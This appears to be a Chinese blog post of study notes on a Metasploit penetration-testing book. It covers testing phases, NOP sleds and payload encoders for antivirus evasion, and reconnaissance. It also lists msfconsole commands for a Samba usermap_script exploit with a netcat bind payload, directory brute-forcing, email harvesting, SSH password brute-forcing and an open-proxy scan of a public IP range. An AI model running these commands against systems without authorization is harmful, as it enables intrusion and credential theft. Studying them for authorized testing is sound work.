《Metasploit渗透测试魔鬼训练营》

渗透测试基本环节

  1. 前期交互阶段,渗透测试团队与客户组织进行交互讨论,最重要的是确定渗透测试的范围、目标、限制条件以及服务合同细节,包括:收集客户需求,准备测试计划,定义测试范围和边界,定义业务目标、项目管理与规划
  2. 情报收集阶段,渗透测试团队可以利用各种信息来源与搜集技术方法,尝试获取更多关于目标组织网络拓扑,系统配置与安全防御的信息(IP地址,子域名,端口开放状态,防火墙状态,目标采用的服务种类和版本,公司组织架构,目标组织架构,目标人员架构等),包括:公开来源信息查询(zooomeye,fofa,shodan),Google hacking(目前由于中国防火长城,需要翻墙),社会工程学,网络踩点,扫描探测,被动监听等
  3. 威胁建模,从大量信息中进行筛选,确定最可行的攻击路径
  4. 漏洞分析阶段。综合分析前几个阶段获取的情报信息,特别是安全扫描结果、服务查点信息等,通过搜索可获取的渗透测试代码资源,找出可以实施攻击的攻击点,并在实验环境中进行验证。
  5. 渗透攻击阶段,利用所找出的目标系统安全漏洞,真正入侵到系统中,获取访问控制权
  6. 后渗透攻击阶段,渗透测试团队根据目标组织的业务的经营模式,保护资产形式与安全防御计划的不同特点,自主设计出攻击目标,识别关键基础设施,并寻找客户组织最具价值和尝试安全保护的信息和资产,最终达成能够对客户组织造成最重要的业务影响的攻击途径
  7. 报告阶段,渗透测试报告需要展示之前所有阶段中,渗透测试团队所获取的关键信息请把,探测和发掘出的系统安全漏洞、成功渗透攻击的过程,以及造成业务影响后果的攻击途径,同时还要站在防御者的角度上,帮助他们分析安全防御体系中的薄弱环节,存在的问题,以及修补与升级技术方案。

代码审计-》白盒测试   逆向工程-》灰盒测试 Fuzz测试-》黑盒测试

空指令(NOP)

空指令(NOP)是一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,最典型的空指令就是空操作,在x86 CPU体系架构平台上的操作码是0x90。

在渗透攻击构造邪恶数据缓冲区时,常常要在真正要执行的Shellcode之前添加一段空指令区,这样当触发渗透攻击后跳转执行Shellcode时,有一个较大的安全着陆区,从而避免受到内存地址随机化、返回地址计算偏差等原因造成的Shellcode 执行失败,提高渗透攻击的可靠性。

编码器模块

编码器模块的第一个使命是确保攻击载荷中不会出现渗透攻击过程中应加以避免的“坏字符”,这些“坏字符”的存在将导致特殊构造的邪恶数据缓冲区无法按照预期目标完全输入到存有漏洞的软件例程中,从而使得渗透攻击触发漏洞之后无法正确执行攻击载荷,达成控制系统的目标。

典型的"坏字符"就是0x00空字节,在大量漏洞所在的字符串操作函数中,输入字符串中的空字节会被解释为字符串的末尾,这样会将后面内容进行截断,从而使得攻击载荷没有完整地被运行,导致攻击失败。

编码器的第二个使命是对攻击载荷进行"免杀"处理,即逃避反病毒软件、IDS 入侵检测系统和IPS入侵防御系统的检测与阻断。通过各种不同形式的编码,甚至是多个编码器的嵌套编码,可以让攻击载荷变得面目全非,避免载荷中含有一些安全检测与防御机制能够轻易识别的特征码,从而能够达到"免杀"的效果

TARGET :192.168.91.141

ATTACKER:192.168.91.143

msfconsole
earch samba
use exploit/multi/samba/usermap_script
show payloads
set payload /payload/cmd/unix/bind_netcat
show options
set RHOSTS 192.168.91.141
exploit

 

whois是一个用来查询域名注册信息数据库的工具,一般的域名注册信息会包含域名所有者、服务商、管理员邮件地址、域名注册日期和过期日期等,这些信息往往是非常有价值的。可以直接通过在MSF终端中使用whois 命令对域名注册信息进行查询,

提示:进行whois查询时请去掉www、ftp 等前缀,这是由于机构在注册域名时通常会注册一个上层域名,其子域名由自身的域名服务器管理,在whois数据库中可能查询不到。例如www.testfire.net是testfire.net的一个子域名。

nslookup与dig两个工具功能上类似,都可以查询指定域名所对应的IP地址,所不同的是dig工具可以从该域名的官方DNS服务器上查询到精确的权威解答,而nslookup只会得到DNS解析服务器保存在Cache中的非权威解答。

IP2Domain反查域名

反向IP查找:10.242.10.36 (ipaddress.com)

Google Hacking技术

Google Hacking Database (GHDB) - Google Dorks, OSINT, Recon (exploit-db.com)

GHDB Google黑客数据库

发现新的进攻性安全资源|福克斯主教 (bishopfox.com)

www.mcafee.com/us/downloads/free-tools/sitedigger.aspx GHDB自动搜索工具(收费)

Web网站同你使用的文件系统一样,会按照内容或功能分出一些子目录。有些目录是希望被来访者看到的,而有些则可能存储了一些不希望被所有人查看的内容,比如一些存储了私人文件的目录,以及管理后台目录等。

在浏览网站目录时,应当对以下几种文件特别留意:

口扩展名为inc的文件:可能会包含网站的配置信息,如数据库用户名/口令等。口扩展名为bak的文件:通常是一些文本编辑器在编辑源代码后留下的备份文件,可

以让你知道与其对应的程序脚本文件中的大致内容。

口扩展名为 txt或 sql的文件:一般包含网站运行的SQL脚本,可能会透露类似数据库结构等信息。

网站目录爆破

use auxiliary/scanner/http/dir_scanner
set THREADS 50
set RHOSTS www.xxx.com
exploit

 邮件地址收集

use auxiliary/gather/search_email_collector
set DOMAIN qq.com
run

google可能连接失败

use auxiliary/scanner/telnet/telnet_version
set RHOSTS 192.168.91.141
set THREADS 100
run
use auxiliary/scanner/ssh/ssh_version
use auxiliary/scanner/oracle/tnslsnr_version #发现后台服务器上开放的Oracle数据库
use auxiliary/scanner/http/open_proxy
set SITE www.google.com
set RHOSTS 24.25.24.1-24.25.26.254
set MULTIPORTS true 
set VERIFY_CONNECT true
set THREADS 100
run  #开放代理探测
use auxiliary/scanner/ssh/ssh_login #ssh弱密码口令爆破

这是由于Web应用存在的一些固有缺陷所决定的,主要存在以下7点。

1)广泛性:当前 Web应用几乎是无处不在,云计算概念提出后,各种Web应用放在云里面,更增加了Web应用的广泛性。可以说,攻击者在Web应用攻击这方面是从来不缺乏目标的。

2)技术门槛低:技术门槛低是从两方面考虑的。一方面,对攻击者来说,Web攻击技术相对传统的操作系统攻击技术而言简单得多,也更容易理解。另一方面,诸如IIS+ASP. NET和LAMP(Linux/Apache/MySQL/PHP)这些Web平台的不断增加和流行,大多数Web应用程序不需要什么开发经验,就能够开发所需的应用。再次说明了Web技术简单易懂,进入的技术门槛低。

3)防火墙可绕过性:几乎所有的防火墙策略都会允许流入方向的HTTP/S(这不是防火墙本身的漏洞,而是管理员的配置策略问题)。这样的策略相对于Web应用攻击来说,防火墙形同虚设。

4)安全机制不够成熟:认证和授权技术在互联网上已经流行多年,但是HTTP在这方面的发展还处于滞后阶段。尽管很多开发人员在自己的应用中加入了认证代码,但是往往这些代码是存在问题的。

5)隐蔽性:在互联网上目前还存在很多无法进行取证的地方,Web攻击就是一个很好的反取证平台。在Web攻击过程中,很容易通过各种公开的HTTP代理发起攻击,更有甚者同时利用多个代理发动攻击,这样使得追溯与取证工作变得更加困难。

6)变化性:Web应用的调整对于一个业务经常变化的公司来说,可以算是家常便饭,但是对于调整Web应用的开发人员、系统管理员等,他们往往缺乏充分的安全培训,却有着对复杂网络应用修改的特权,这样很难保证安全策略很好的实施。

7)利益性:利益永远是各种攻击的驱动力,Web攻击也不例外。近期相关司法部门公布有组织性的Web应用攻击,谋取利益的犯罪团伙案件越来越多,无论直接攻击Web 应用服务器,还是攻击欺骗客户终端的钓鱼攻击,抑或是通过可怕的分布式拒绝服务攻击(DDoS)进行敲诈,通过Web犯罪可以说是利润丰厚。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: Metasploit渗透测试魔鬼训练营是一种针对渗透测试人员的培训课程,旨在帮助学员掌握使用Metasploit框架进行渗透测试的技能。该课程包括理论知识和实践操作,涵盖了Metasploit框架的基础知识、漏洞利用、后渗透等内容。通过参加该训练营,学员可以提高自己的渗透测试技能,为企业提供更加全面和有效的安全保障。 ### 回答2: Metasploit渗透测试魔鬼训练营是一种专注于渗透测试技术的培训计划。Metasploit是一款广泛使用的渗透测试工具,能够帮助安全专业人士评估网络系统的弱点和漏洞,并提供相应的修复方案。Metasploit渗透测试魔鬼训练营旨在提供系统性的培训,使学员能够熟练运用Metasploit进行渗透测试,并成为专业的渗透测试人员。 这个魔鬼训练营采用实践与理论相结合的教学方法,通过大量的实际案例和模拟演练来帮助学员有效掌握渗透测试技术。训练营的内容包括Metasploit的基础知识、常见漏洞的挖掘与利用、渗透测试的方法与策略等。学员将学习如何利用Metasploit对目标网络进行扫描、漏洞利用和漏洞修复,以保证网络安全。 在这个训练营中,学员还将接触到实际渗透测试的场景和挑战,通过团队合作来解决复杂的安全问题。这不仅可以提高学员的问题解决能力,还可以培养他们的团队合作精神和沟通能力。 Metasploit渗透测试魔鬼训练营适合那些对渗透测试感兴趣,想要提升自己技能的安全专业人员。通过参加这个培训计划,学员可以全面了解Metasploit的功能与应用,并具备进行渗透测试的实际能力。这对于保护网络安全,提高企业的安全性具有重要意义。 ### 回答3: Metasploit是一款著名的渗透测试工具,它被广泛用于评估网络系统的安全性和漏洞。Metasploit渗透测试魔鬼训练营是一个专门针对Metasploit工具进行训练和实践的培训班。 这个训练营的目的是让参与者全面了解Metasploit的功能和使用方法,并通过实际操作和挑战来提高他们的渗透测试技能。在训练中,学员将学习如何使用Metasploit来发现和利用目标系统中的漏洞,以及如何进行渗透测试和攻击模拟。这些实践活动将使学员更好地理解网络安全漏洞的本质和攻击者的行为方式。 Metasploit渗透测试魔鬼训练营的学习过程是非常实际的,学员将通过真实情景模拟来进行虚拟网络环境下的渗透测试。他们将学习如何选择和配置适当的漏洞利用模块,如何使用payloads以获取系统访问权限,并了解如何绕过防御机制和检测系统。 这个训练营的主要优势之一是培训者具有丰富的经验和专业知识,能够引导学员在实践中掌握Metasploit的各个方面。此外,训练营还提供了配套的学习资料和交互环节,使学员能够进一步加强他们的学习效果。 总而言之,Metasploit渗透测试魔鬼训练营是一个提供高质量Metasploit培训和实践机会的地方。通过参加这个训练营,学员可以提高他们的渗透测试技能,增强他们评估网络安全的能力,并为他们未来的职业发展打下坚实的基础。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值